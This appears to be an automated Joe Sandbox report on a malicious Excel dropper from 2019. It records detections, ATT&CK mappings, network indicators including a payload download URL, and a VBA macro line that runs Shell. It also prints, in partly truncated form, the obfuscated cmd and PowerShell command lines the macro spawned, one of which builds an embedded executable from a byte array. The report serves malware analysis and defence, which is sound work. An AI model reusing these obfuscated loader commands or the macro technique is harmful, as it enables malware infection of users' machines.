Analysis Report 7362_8164_(2019.2).xls

Overview

General Information

Joe Sandbox Version:	25.0.0 Tiger's Eye
Analysis ID:	808000
Start date:	05.03.2019
Start time:	17:14:28
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 4m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	7362_8164_(2019.2).xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled GSI enabled (VBA)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.expl.evad.winXLS@7/6@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	84	0 - 100	Report FP / FN	false

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Command-Line Interface21	Winlogon Helper DLL	Process Injection1	Disabling Security Tools1	Credential Dumping	Process Discovery1	Application Deployment Software	Data from Local System	Data Encrypted1	Standard Non-Application Layer Protocol2
Replication Through Removable Media	PowerShell3	Port Monitors	Accessibility Features	Process Injection1	Network Sniffing	Security Software Discovery1	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Application Layer Protocol2
Drive-by Compromise	Scripting22	Accessibility Features	Path Interception	Deobfuscate/Decode Files or Information1	Input Capture	Remote System Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Custom Cryptographic Protocol
Exploit Public-Facing Application	Exploitation for Client Execution13	System Firmware	DLL Search Order Hijacking	Scripting22	Credentials in Files	File and Directory Discovery1	Logon Scripts	Input Capture	Data Encrypted	Multiband Communication
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Masquerading	Account Manipulation	System Information Discovery21	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol

Signature Overview

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: 7362_8164_(2019.2).xls

virustotal: Detection: 45%

Perma Link

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: benistora.com

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.82:49218 -> 5.188.60.66:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.82:49218 -> 5.188.60.66:443

Networking:

Connects to country known for bullet proof hosters

Show sources

Source: unknown

Network traffic detected: IP: 5.188.60.66 Russian Federation

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Show sources

Source: global traffic

TCP traffic: 192.168.1.82:49218 -> 5.188.60.66:443

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO

Jump to behavior

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: benistora.com

Urls found in memory or binary data

Show sources

Source: powershell.exe, 00000005.00000002.1636645086.01F76000.00000004.sdmp	String found in binary or memory: https://benistora.com
Source: powershell.exe, 00000005.00000002.1634819377.00307000.00000004.sdmp	String found in binary or memory: https://benistora.com/uploads/audio.7z
Source: powershell.exe, 00000005.00000002.1636329423.01D34000.00000004.sdmp	String found in binary or memory: https://benistora.com/uploads/audio.7zH

Uses HTTPS

Show sources

Source: unknown

Network traffic detected: HTTP traffic on port 49218 -> 443

System Summary:

Document contains an embedded VBA macro which may execute processes

Show sources

Source: 7362_8164_(2019.2).xls

OLE, VBA macro line: twing = Shell(Gle(Gle(Ety(Gle(Ety(Leged, Ts)), Ts))) & RawsAndTabs & GeneralOptinss, 0)

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: 7362_8164_(2019.2).xls	OLE, VBA macro line: Private Declare PtrSafe Function GetUserDefaultLCID% Lib "kernel32" ()
Source: 7362_8164_(2019.2).xls	OLE, VBA macro line: Private Declare PtrSafe Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
Source: 7362_8164_(2019.2).xls	OLE, VBA macro line: Private Declare PtrSafe Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String) As Boolean
Source: 7362_8164_(2019.2).xls	OLE, VBA macro line: Private Declare Function GetUserDefaultLCID% Lib "kernel32" ()
Source: 7362_8164_(2019.2).xls	OLE, VBA macro line: Private Declare Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
Source: 7362_8164_(2019.2).xls	OLE, VBA macro line: Private Declare Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String) As Boolean

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 5.188.60.66 443

Jump to behavior

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 7042
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: Commandline size = 7042			Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: 7362_8164_(2019.2).xls	OLE, VBA macro line: Private Sub st1_Layout()
Source: VBA code instrumentation	OLE, VBA macro: Module Sheet1, Function st1_Layout			Name: st1_Layout

Document contains embedded VBA macros

Show sources

Source: 7362_8164_(2019.2).xls

OLE indicator, VBA macros: true

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Yara signature match

Show sources

Source: 00000005.00000002.1636004810.01A69000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1638447073.04EE0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1635995960.01A60000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1634369984.00150000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1634433896.00190000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1634948704.011C0000.00000004.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.1634387196.00160000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1634303771.000D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1638385697.04350000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1638206829.03EE0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1635853654.01920000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1634554312.00220000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000005.00000002.1636329423.01D34000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.4350000.5.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.4350000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.220000.2.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.160000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.160000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.1920000.3.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.1920000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.220000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.3ee0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 5.2.powershell.exe.3ee0000.4.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs

Classification label

Show sources

Source: classification engine

Classification label: mal84.expl.evad.winXLS@7/6@1/1

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Excel

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVR76AB.tmp

Jump to behavior

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Show sources

Source: 7362_8164_(2019.2).xls

OLE indicator, Workbook stream: true

Found command line output

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.jl...#........3.j....L.,.L\|.j.......l$(.j...lr.v.L\|.jD............7.j.......jL.,..<<.............$(.j...j....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...#.....<.X...A.5w................a.5w..0.....,.......T...f...................#.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L.../....<<.....A.5wt...............a.5w..0.....,.......T......................./.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L.../.....<.X...A.5w................a.5w..0.....,.......T......................./.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...;....<<.....A.5wt...............a.5w..0.....,.......T.......................;.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...;.....<.X...A.5w................a.5w..0.....,.......T.......................;.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...G...s.e.r.v.e.r.".".".".........a.5w..0.....,.......T.......................G.......T.........4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L.........<.X...A.5w................a.5w..0.....,...........V.....................................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.8.....,.......................................T...$.....4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L.........<.X...A.5w................a.5w..0.....,.................................................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...'....<<.....A.5wt...............a.5w..0.....,...............................'.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...'.....<.X...A.5w................a.5w..0.....,...............................'.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...3....<<.....A.5wt...............a.5w..0.....,...............................3.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...3.....<.X...A.5w................a.5w..0.....,...........)...................3.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...?....<<.....A.5wt...............a.5w..0.....,...........Q...................?.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...?.....<.X...A.5w................a.5w..0.....,...........l...................?.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...K....<<.....A.5wt...............a.5w..0.....,...............................K.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...K.....<.X...A.5w................a.5w..0.....,...............................K.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...W...s.s.'.,.'.P.'.).).). .).....a.5w..0.....,...............................W.......T.........4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...W.....<.X...A.5w................a.5w..0.....,...............................W.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...c....<<.....A.5wt...............a.5w..0.....,...............................c.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...c.....<.X...A.5w................a.5w..0.....,...........5...................c.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...o....<<.....A.5wt...............a.5w..0.....,...........]...................o...........f.....4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...o.....<.X...A.5w................a.5w..0.....,...........x...................o.................4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........t...L...{... .<.....A.5wt...............a.5w..0.....,...............................{.......T.........4w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............L...{.....<.X...A.5w................a.5w..0.....,...............................{.................4w........	Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: 7362_8164_(2019.2).xls

virustotal: Detection: 45%

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c%sUG%
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c%sUG%	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: indows\System.pdbpdbtem.pdb0. source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbAC_ source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source:	Binary string: System.pdbjj source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source:	Binary string: dows\System.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb56ad364e35\System.Management.Automation.pdbtion.ni.dllility.resources.exe source: powershell.exe, 00000005.00000002.1634819377.00307000.00000004.sdmp
Source:	Binary string: em.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdbAu source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source:	Binary string: System.Management.Automation.pdb$ source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.1635853654.01920000.00000002.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.1638488895.051CD000.00000004.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1636004810.01A69000.00000004.sdmp

Data Obfuscation:

Obfuscated command line found

Show sources

